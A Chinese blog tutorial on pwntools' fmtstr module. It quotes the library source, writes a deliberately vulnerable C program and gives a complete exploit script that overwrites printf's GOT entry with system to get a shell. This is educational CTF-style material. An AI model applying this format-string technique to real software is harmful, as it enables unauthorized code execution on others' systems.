pwntools中fmtstr的使用

最新推荐文章于 2024-02-02 09:53:20 发布
最新推荐文章于 2024-02-02 09:53:20 发布
阅读量4k 收藏 16
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113503914
版权

pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的
可以查看源码

该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload

class FmtStr(object):

    def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0):
        self.execute_fmt = execute_fmt
        self.offset = offset
        self.padlen = padlen
        self.numbwritten = numbwritten

        if self.offset is None:
            self.offset, self.padlen = self.find_offset()
            log.info("Found format string offset: %d", self.offset)

        self.writes = {}
        self.leaker = MemLeak(self._leaker)

	...

execute_fmt, 交互函数
offset(=None), 第一个格式化程序的偏移量
padlen(=0), payload之前填充的字节数
numbwritten(=0), 已写入的字节数

def fmtstr_payload(offset, writes, numbwritten=0, write_size='byte', write_size_max='long', overflows=16, strategy="small", badbytes=frozenset(), offset_bytes=0):
    sz = WRITE_SIZE[write_size]
    szmax = WRITE_SIZE[write_size_max]
    all_atoms = make_atoms(writes, sz, szmax, numbwritten, overflows, strategy, badbytes)

    fmt = b""
    for _ in range(1000000):
        data_offset = (offset_bytes + len(fmt)) // context.bytes
        fmt, data = make_payload_dollar(offset + data_offset, all_atoms, numbwritten=numbwritten)
        fmt = fmt + cyclic((-len(fmt)-offset_bytes) % context.bytes)

        if len(fmt) + offset_bytes == data_offset * context.bytes:
            break
    else:
        raise RuntimeError("this is a bug ... format string building did not converge")

    return fmt + data

offset, 第一个格式化程序的偏移量
writes, 往addr里写入value值
numbwritten=0, 已经由printf写入的字节数
write_size=‘byte’, 指定逐byte/short/int写

来个栗子
#include<stdio.h>
#include<string.h>
int main(){
    char str[1024];
    while(1){
        memset(str, '\0', 1024);
        read(0, str, 1024);
        printf(str);
        fflush(stdout);
    }
}

gcc -m32 -fno-stack-protector -no-pie fmtstr.c -o fmtstr -g

利用方式是将printf()的地址改成system(), 这样下次输入"/bin/sh"就能拿shell
断点到printf, 查看变量的偏移量
在这里插入图片描述
接下来查看printf()的GOT地址, 虚拟地址, 和system()的虚拟地址
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
注意虚拟地址需要的是运行时地址, 加载libc时才有system符号, 另外非运行和运行时地址不一样

有了偏移量和printf()的GOT地址, 虚拟地址, 和system()的虚拟地址就可以写exploit了

from pwn import *
elf = ELF('fmtstr')
io = process('./fmtstr')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6') 
#TODO: change it depanding on your file`s local position 

def exec_fmt(payload):
    io.sendline(payload)
    info = io.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset

printf_got = elf.got['printf']
payload = p32(printf_got) + '%{}$s'.format(offset)
io.send(payload)
printf_addr = u32(io.recv()[4:8])
system_addr = libc.symbols['system'] + (printf_addr - libc.symbols['printf'])
log.info("system_addr => %s" % hex(system_addr))

payload = fmtstr_payload(offset, {printf_got: system_addr})
io.send(payload)
io.send('/bin/sh')
io.recv()
io.interactive()

先泄漏printf_addr, 通过相对地址偏移量计算出system_addr, 覆盖地址即可
在这里插入图片描述
拿到shell!

坑点总结

注意是
elf.got[’’], 不是
elf.got(’’)
注意符号, 这里浪费了很多时间和心情

fa1c4
关注
专栏目录
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6609
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
fmtstr1
m0_49959202的博客
09-18 250
文章目录fmtstr11.程序分析2.exp编写 fmtstr1 1.程序分析 file一下: checksec一下: ida分析一下,发现存在printf(&buf),这里有格式化字符串漏洞,可以进行利用 发现如果x是4的话,就能够获取到shell,但是在数据段内x的值为3: 因此,需要利用格式化字符串利用,将x的值从3修改为4。 使用gdb进行调试,在printf处设置断点。 输入"%d%d", 当进入printf(&buf)时,查看栈内变量,发现"%d%d"是格式化字符串的第1
CTF-Wiki pwn fmtstr(格式化字符串漏洞)
mumuzi的博客
07-24 934
https://www.yinxiang.com/everhub/note/f07ff198-5072-4014-b110-21fb833affee –原理 –格式化字符串 –程序崩溃 –泄漏内存 –泄漏栈内存 –泄漏任意地址内存:覆盖小数字、覆盖大数字 –例题1:x64格式化字符串漏洞 –例题2:hijack GOT 劫持GOT表 –例题3:hijack retaddr 劫持返回地址 –盲打 笔记若存在逻辑问题或者原则性问题,恳请在评论区指正,谢谢观看笔记的师傅。之后会出一期萌新常见的问题(主要只是为了自
Pwn 学习 fmt_str_level_1_x64 格式化字符串
MrTreebook的博客
09-10 368
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload。pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1166
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串。
Fmtstr_Loop
钞sir的博客
06-23 9790
前言 很多时候都是因为程序存在循环,如果程序不存在循环呢?在一些栈溢出我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点… 实例 题目:12届信息安全国赛半决赛西南赛区 思路 虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_m...
三个白帽 pwnme - k0 [fmtstr] - [Hijack RetAddr]
ACdream
02-27 1079
程序运行起来功能很简单:输入用户名密码、输出用户名密码、退出 运行起来发现:这里可能会有个缓冲区溢出的漏洞,在输入用户名时可以超过20个,超过的部分成了密码 进一步测试发现,该程序存在fmtstr漏洞 在程序4008A6处提供了system("/bin/sh"),所以我们的思路是,劫持某个函数返回地址到这儿即可 先来计算偏移: 在这里下断 Breakpoi...
CTF-pwn pwntools用法探索
dzqxwzoe的博客
02-02 1854
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
pwntools工具的使用(随时更新...)
lifanxin的博客
12-11 4848
pwntools工具的使用基本交互和输入输出绑定要处理的程序获取程序输出实现输入 基本交互和输入输出 绑定要处理的程序 # 远程 # remote(ip/hostname, port) p = remote("127.0.0.1", 8888) # 本地 # 注意process参数一定要有./ p = process("./pwn") 获取程序输出 buf = p.recvline() # buf为程序的一行输出 buf = p.recv() # buf为程序的当前全部输出 # 直
python3-pwntools教程_一步一步学pwntools
weixin_39624429的博客
12-23 1259
刚刚注册看雪,就来水一篇文章。本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。英语原文:下面开始正文:序pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然...
[pwn基础]Pwntools学习.doc
07-10
安装 Pwntools 非常简单,首先确保已经安装了 pip,然后使用以下命令进行安装: ```bash sudo apt-get install python3-pip pip install pwntools -i https://pypi.tuna.tsinghua.edu.cn/simple ``` 安装完成后,...
fmtstr_payload
最新发布
04-15
fmtstr_payload是pwntools的一个工具函数,用于简化构造格式化字符串漏洞的payload。它的语法如下: ```python fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') ``` - offset:表示格式化...
Pwntools使用介绍
AlexYoung28的博客
10-18 7943
pwntools是一个用python编写的CTF pwn题exploit编写工具,目的是为了帮助 使用者更高效便捷地编写exploit。 目前最新稳定版本为3.12.0(2018年5月 )。文档地址:docs.pwntools.com。 一、环境变量设置 Pwntools的许多设置都是通过全局变量context进行控制的,例如系统、架构、字节序等都可以通过如下的方法更改: &gt;&gt;...
SysUtils.FmtStr、SysUtils.Format - 格式化输出
weixin_34095889的博客
03-31 107
FmtStr 是个过程, 它是用第一个参数来返回结果的; Format 是个函数, 返回值就是格式后的结果. 举例: var str: string; begin FmtStr(str, '最大整数是: %d', [MaxInt]); ShowMessage(str); {最大整数是: 2147483647} ...
一步一步学pwntools(适合新手)
qq_41683305的博客
04-09 5158
pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然而目前并没有一个很好的新手教程。因此我用了我过去的几篇writeup。由于本文只是用来介绍pwntools使用方法,我不会过于详细的讲解各种二进制漏洞攻击技术。 Pwntools的“Hello World” 栈溢出无疑是二进制攻击的“Hello World”。这里,我们用pwnable.kr的bof来进行展示。 #incl...
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 2654
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4954
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
CTF pwn题之格式化字符串漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值